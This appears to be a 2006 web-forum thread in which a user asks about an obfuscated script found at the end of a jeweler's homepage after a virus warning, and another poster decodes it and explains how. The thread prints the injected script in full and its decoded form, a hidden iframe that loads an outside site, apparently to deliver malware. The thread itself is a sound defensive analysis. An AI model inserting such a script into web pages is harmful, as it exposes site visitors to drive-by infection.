Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Programming > HTML > malicious script?

Reply
Thread Tools

malicious script?

 
 
Jack Mahon
Guest
Posts: n/a
 
      03-27-2006
Hello,

a friend visited a commercial jeweler's website and somehow got a virus
warning on her computer ("win32/worfo").

I checked out the site in question, but could find nothing on the home page
code except the last line in the source code, located after the body
end-tag.

The line is this:
<script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>

I don't have a clue what this means. Can anyone help?

thanks,

Jack M


 
Reply With Quote
 
 
 
 
BootNic
Guest
Posts: n/a
 
      03-27-2006
> "Jack Mahon" <(E-Mail Removed)> wrote:
> news:viJVf.13061$%H.12433@clgrps13....
>
> Hello,
>
> a friend visited a commercial jeweler's website and somehow got a
> virus warning on her computer ("win32/worfo").
>
> I checked out the site in question, but could find nothing on the
> home page code except the last line in the source code, located
> after the body end-tag.
>
> The line is this:
> <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>
>
> I don't have a clue what this means. Can anyone help?



Looks like it adds a hidden iframe.

document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");


--
BootNic Monday, March 27, 2006 12:51 AM

Have no fear of perfection - you'll never reach it.
*Salvador Dali*

 
Reply With Quote
 
 
 
 
gerg
Guest
Posts: n/a
 
      03-27-2006

> Looks like it adds a hidden iframe.
>
> document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>");
>
>

How in the world did you derive that? Not doubting your ability, but it
looked like total gibberish.

-g-

 
Reply With Quote
 
BootNic
Guest
Posts: n/a
 
      03-28-2006
> "gerg" <(E-Mail Removed)> wrote:
> news:(E-Mail Removed). ...
>
>>> <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>

>> Looks like it adds a hidden iframe.
>>
>> document.write("<iframe style='display:none' width=1 height=1
>> src='http://trust4free.ws/?id=index19'></iframe>");
>>
>>

> How in the world did you derive that? Not doubting your ability,
> but it looked like total gibberish.


Replace eval(o); with alert(o);

--
BootNic Monday, March 27, 2006 9:04 PM

"I've noticed that the press tends to be quite accurate, except when
they're writing on a subject I know something about."
*Keith F. Lynch*

 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Malicious TAGS adyda HTML 3 09-25-2005 10:04 AM
ActiveX apologetic Larry Seltzer... "Sun paid for malicious ActiveX code, and Firefox is bad, bad bad baad. please use ActiveX, it's secure and nice!" (ok, the last part is irony on my part) fernando.cassia@gmail.com Java 0 04-16-2005 10:05 PM
preventing malicious user input Stimp ASP .Net 1 09-15-2004 03:25 AM
Malicious websites bjones Computer Support 27 12-09-2003 08:02 PM
malicious forged posts in my name miss calm Computer Support 13 08-10-2003 03:18 AM



Advertisments